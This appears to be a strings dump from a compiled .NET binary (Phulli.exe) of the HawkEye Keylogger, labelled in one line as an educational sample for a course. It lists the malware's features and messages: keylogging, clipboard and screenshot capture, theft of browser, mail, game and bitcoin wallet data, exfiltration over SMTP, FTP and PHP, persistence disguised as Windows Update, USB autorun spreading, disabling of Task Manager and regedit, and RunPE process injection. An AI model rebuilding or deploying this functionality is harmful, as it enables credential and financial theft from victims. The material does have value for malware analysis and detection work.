NetworkInterface
System.Net.NetworkInformation
GetAllNetworkInterfaces
get_NetworkInterfaceType
NetworkInterfaceType
get_OperationalStatus
OperationalStatus
IsConnectedToInternet
Foldersinstall
MessageBox
Show
DialogResult
MessageBoxButtons
MessageBoxIcon
FakemsgInstall
MailMessage
System.Net.Mail
SmtpClient
ToDouble
Replace
get_Clock
Clock
get_LocalTime
get_Info
ComputerInfo
get_InstalledUICulture
CultureInfo
System.Globalization
get_OSFullName
MailAddress
set_From
get_To
MailAddressCollection
set_Subject
set_Body
set_Port
set_EnableSsl
NetworkCredential
System.Net
set_Credentials
ICredentialsByHost
Send
ServerInstall
get_Registry
RegistryProxy
SetValue
RegistryValueKind
Microsoft.Win32
unHide
DirectoryInfo
FileSystemInfo
set_Attributes
FileAttributes
unhidden
DriveInfo
StreamWriter
GetDrives
get_DriveType
DriveType
TextWriter
WriteLine
Close
SetAttributes
Spread
RegistryKey
FileSystem
FileCopy
Registry
CurrentUser
OpenSubKey
addtostartup
DESCryptoServiceProvider
System.Security.Cryptography
MD5CryptoServiceProvider
ICryptoTransform
Byte
Encoding
System.Text
get_Unicode
GetBytes
HashAlgorithm
ComputeHash
Array
DES
set_Key
SymmetricAlgorithm
set_Mode
CipherMode
CreateDecryptor
TransformFinalBlock
GetString
DES_Decrypt
input
pass
get_ASCII
olddesdc
NewLateBinding
LateGet
ChangeType
run
Environ
StartStealers
LateCall
stealMail
get_Version
Version
get_OSPlatform
get_OSVersion
stealWebroswers
WebClient
StreamReader
Stream
OpenRead
ReadToEnd
readweb
url
FileStream
DoEvents
WaitUntilFileIsAvailable
Filename
get_Attachments
AttachmentCollection
Attachment
Collection`1
Pins
Bitcoinsub
MemoryStream
GZipStream
System.IO.Compression
BitConverter
ToInt32
Write
set_Position
CompressionMode
Read
get_UTF8
DecompressString
compressedText
Minecraftsub
GetProcesses
get_ProcessName
Disabler
Graphics
Bitmap
Rectangle
Point
CreateDirectory
get_Screen
Screen
get_Bounds
get_Width
get_Height
FromImage
Image
CopyFromScreen
Save
SendLogs
SendLogsFTP
FtpWebRequest
BinaryWriter
WebRequest
Create
ICredentials
set_Method
GetRequestStream
UploadFTP
Data
ReadAllBytes
SendLogsPHP
DownloadString
UploadPHP
get_TimeOfDay
get_Clipboard
ClipboardProxy
GetText
CH_Changed
RijndaelManaged
AES_Decrypt
CryptoStream
CryptoStreamMode
Decrypt
encryptedBytes
secretKey
Rfc2898DeriveBytes
set_KeySize
get_BlockSize
Math
Round
set_IV
get_KeySize
set_Padding
PaddingMode
getAlgorithm
seekanddestroy
process__1
IPAddress
Dns
GetHostName
GetHostEntry
IPHostEntry
get_AddressList
get_AddressFamily
AddressFamily
System.Net.Sockets
GetInternalIP
GetExternalIP
IndexOf
GetBetween
Source
Before
After
ManagementObjectCollection
ManagementObjectSearcher
ManagementObject
ManagementObjectEnumerator
get_MachineName
Get
ManagementBaseObject
GetAntiVirus
GetFirewall
ManagementClass
GetInstances
get_Properties
PropertyDataCollection
PropertyData
get_Value
HWID
DesignerGeneratedAttribute
KBDLLHOOKSTRUCT
ValueType
vkCode
scanCode
flags
time
dwExtraInfo
virtualKey
Enum
value__
K_Return
K_Backspace
K_Space
K_Tab
K_Esc
K_Control
K_LControl
K_RControl
K_Delete
K_End
K_Home
K_Insert
K_Shift
K_LShift
K_RShift
K_Pause
K_PrintScreen
K_LWin
K_RWin
K_Alt
K_LAlt
K_RAlt
K_NumLock
K_CapsLock
K_Up
K_Down
K_Right
K_Left
K_F1
K_F2
K_F3
K_F4
K_F5
K_F6
K_F7
K_F8
K_F9
K_F10
K_F11
K_F12
K_F13
K_F14
K_F15
K_F16
K_F17
K_F18
K_F19
K_F20
K_F21
K_F22
K_F23
K_F24
K_Numpad0
K_Numpad1
K_Numpad2
K_Numpad3
K_Numpad4
K_Numpad5
K_Numpad6
K_Numpad7
K_Numpad8
K_Numpad9
K_Num_Add
K_Num_Divide
K_Num_Multiply
K_Num_Subtract
K_Num_Decimal
K_0
K_1
K_2
K_3
K_4
K_5
K_6
K_7
K_8
K_9
K_A
K_B
K_C
K_D
K_E
K_F
K_G
K_H
K_I
K_J
K_K
K_L
K_M
K_N
K_O
K_P
K_Q
K_R
K_S
K_T
K_U
K_V
K_W
K_X
K_Y
K_Z
K_Subtract
K_Decimal
KeyboardHookDelegate
MulticastDelegate
TargetObject
TargetMethod
BeginInvoke
IAsyncResult
AsyncCallback
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
Clipboard
NativeWindow
ChangedEvent
SetClipboardViewer
handle
ChangeClipboardChain
next
SendMessage
code
data
Delegate
Combine
add_Changed
obj
remove_Changed
CreateParams
CreateHandle
get_Handle
Install
Uninstall
Message
get_Msg
get_WParam
get_LParam
op_Equality
WndProc
Finalize
Changed
ChangedEventHandler
Resources
Phulli.My.Resources
resourceMan
ResourceManager
System.Resources
resourceCulture
ReferenceEquals
get_Assembly
get_ResourceManager
get_Culture
set_Culture
GetObject
get_CMemoryExecute
get_mailpv
get_WebBrowserPassView
Culture
CMemoryExecute
mailpv
WebBrowserPassView
MySettings
ApplicationSettingsBase
System.Configuration
defaultInstance
addedHandler
addedHandlerLockObject
SettingsBase
Synchronized
get_SaveMySettingsOnExit
AutoSaveSettings
ObjectFlowControl
CheckForSyncLockOnValueType
ShutdownEventHandler
add_Shutdown
get_Default
Default
MySettingsProperty
get_Settings
Settings
RunPE
WriteProcessMemory
VirtualProtectEx
VirtualAllocEx
SetThreadContext
ResumeThread
ReadProcessMemory
NtUnmapViewOfSection
GetThreadContext
CreateProcessA
StringBuilder
GetEntryAssembly
get_Location
get_SystemDirectory
get_Chars
GetRandomFileName
ChangeExtension
GetDirectoryName
ToInt16
UInt32
Buffer
BlockCopy
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
CompilationRelaxationsAttribute
AssemblyTrademarkAttribute
AssemblyTitleAttribute
AssemblyProductAttribute
DebuggableAttribute
DebuggingModes
AssemblyDescriptionAttribute
RuntimeCompatibilityAttribute
AssemblyFileVersionAttribute
GuidAttribute
Property can only be set to Nothing
WinForms_RecursiveFormCreate
WinForms_SeeInnerException
YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U
YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==
R6xOQvVyglYi1VZrU6YLSXgCm7kggtpdkexS+D7agYk=
587
60000
This is an educational sample for the students studying CECZ4069. Students who are caught infected with this malware on their machines and connected directly to the internet will fail this module automatically.
DAsaMA1AiWAMiX7/2niNpvJ+E0CcAZ0/P/PUZITbhX0UWQ8oMH0QOkPNxtwLtBAs
wY0LEe9y+2yGXhDXmfDrHo+J8EmuP1ocrF5FrTuC1PY=
3/BxGIs7loR7FQ9LFgYmxASj436ZcTD4lx8u+gtq6ug=
PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w==
yesemail
noftp
nophp
dontclearie
dontclearff
bindfiles
downloadfiles
websitevisitor
websiteblocker
notify
DisableSSL
fakeerror
startup
screeny
clip
TaskManager
logger
stealers
melt
reg
cmd
msconfig
Disablespreaders
Disablesteam
\Windows Update.exe
----[
]----
Form1
 - 
 [ctrl] 
 [alt] 
 [ralt] 
 [shift] 
 [del] 
 [esc] 
[/cap]
[cap]
[>]
[V]
[<]
[^]
[BS]
192
219
221
220
222
186
188
191
187
107
111
 [SS] 
[/ctrl]
[/lalt]
[/ralt]
[/shift]
runas
\WindowsUpdate.exe
Disablemelt
SysInfo.txt
\pid.txt
\pidloc.txt
HawkEyeKeylogger
Disablestealers
Disablelogger
Disableclip
BSPLIT2
BSPLIT1
.exe
EBFile_
BFile_
http://
DFile_
\Mozilla\Firefox\Profiles
cookie
\drivers\etc\hosts
127.0.0.1 
\Steam
\config
\SteamAppData.vdf
\ClientRegistry.blob
steam
Disablefakerror
Microsoft Application Error
True
False
Dear HawkEye Customers!
This is an email notification generated by 
 after successful injection of your server.
Best Regards
Admin
HawkEye Logger Details: 
Server Name: 
Keylogger Enabled: 
Clipboard-Logger Enabled: 
Time Logs will be delivered: Every 
 minutes
Stealers Enabled: 
Time Log will be delivered: Average 2 to 4 minutes
Local Date and Time: 
Installed Language: 
Operating System: 
Internal IP Address: 
External IP Address: 
Installed Anti-Virus: 
Installed Firewall: 
Disablenotify
HawkEye_Keylogger_Execution_Confirmed_
.txt
HawkEye Keylogger | Execution Confirmed | 
 | 
EnableSSL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden
autorun.inf
[autorun]
open=Sys.exe
action=Run win32
Sys.exe
Software\Microsoft\Windows\CurrentVersion\Run
Windows Update
CMemoryExecute
Run
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
bitcoin
AppData
\bitcoin\wallet.dat
_wallet.dat
wallet.dat
system32
Microsoft.NET\Framework\v2.0.50727\vbc.exe
/stext "
holdermail.txt"
holdermail.txt
                                 ==============================================
                                            Operating System Intel Recovery
                                 ==============================================
PC Name: 
Local Time: 
Net Version: 
Operating System Platform: 
Operating System Version: 
                                 ==============================================
                                            WEB Browser Password Stealer
                                 ==============================================
                                 ==============================================
                                          Mail Messenger Password Stealer
                                 ==============================================
                                 ==============================================
                                          Internet Download Manager Stealer
                                 ==============================================
                                 ==============================================
                                            JDownloader Password Stealer
                                 ==============================================
HawkEye_Keylogger_Stealer_Records_
HawkEye Keylogger | Stealer Records | 
holderwb.txt"
holderwb.txt
                                 ==============================================
                                            WEB Browser Password Stealer
                                 ==============================================
C:\Users\
\AppData\Roaming\jagex_cache\regPin\
_Pin0.jpeg
_Pin1.jpeg
_Pin2.jpeg
_Pin3.jpeg
_Pin4.jpeg
HawkEye Keylogger | RuneScape Stealer | 
Dear HawkEye Customers!
As you can see, this email has the attached file, containing RuneScape Bank Pins.
Best Regards
Admin
HawkEye Keylogger | BitCoin Stealer | 
Dear HawkEye Customers!
Steals the Wallet.DAT file that holds the users bitcoin currency.
Best Regards
Admin
\.minecraft\lastlogin
HawkEye Keylogger | MineCraft Stealer | 
Dear HawkEye Customers!
As you can see, this email has the attached file, containing MineCraft Username and Password. Please download it then decrypt the login credential  / information with MineCraft Decryptor.
Best Regards
Admin
DisableTaskManager
Taskmgr
taskmgr
Disablecmd
Disablemsconfig
Disablereg
regedit
Disablestartup
HawkEye Keylogger | Keylog Records | 
                                 ==============================================
                                                        ClipBoard Records
                                 ==============================================
                                 **********************************************
                                                        Keylog Records
                                 ==============================================
Disablescreeny
screens
screens\screenshot
.jpeg
HawkEye_Keylogger_Keylog_Records_
ftp://
STOR
?fname=
&data=
[--------
-------]
099u787978786
http://whatismyipaddress.com/
<!-- do not script -->
&#46;
\root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
SELECT * FROM FirewallProduct
win32_processor
processorID
Phulli.Resources
mailpv
WebBrowserPassView
x86
:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
vbc
exe
z\V
MyTemplate
8.0.0.0
My.Computer
My.Application
My.User
My.Forms
My.WebServices
System.Windows.Forms.Form
Create__Instance__
Dispose__Instance__
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
My.Settings
Copyright 
  2014
Phulli
WrapNonExceptionThrows
1.0.0.0
$1f128a07-8438-4dc0-8205-570da0ccce8d
_CorExeMain
mscoree.dll
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
Phulli
FileVersion
1.0.0.0
InternalName
Phulli.exe
LegalCopyright
Copyright 
  2014
OriginalFilename
Phulli.exe
ProductName
Phulli
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
wwwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwww
wwwwww
wwwwww
wwwwww
BBB
BBB
PNG
IHDR
pHYs
IDATx
Q@^
IEND
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
BBB
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
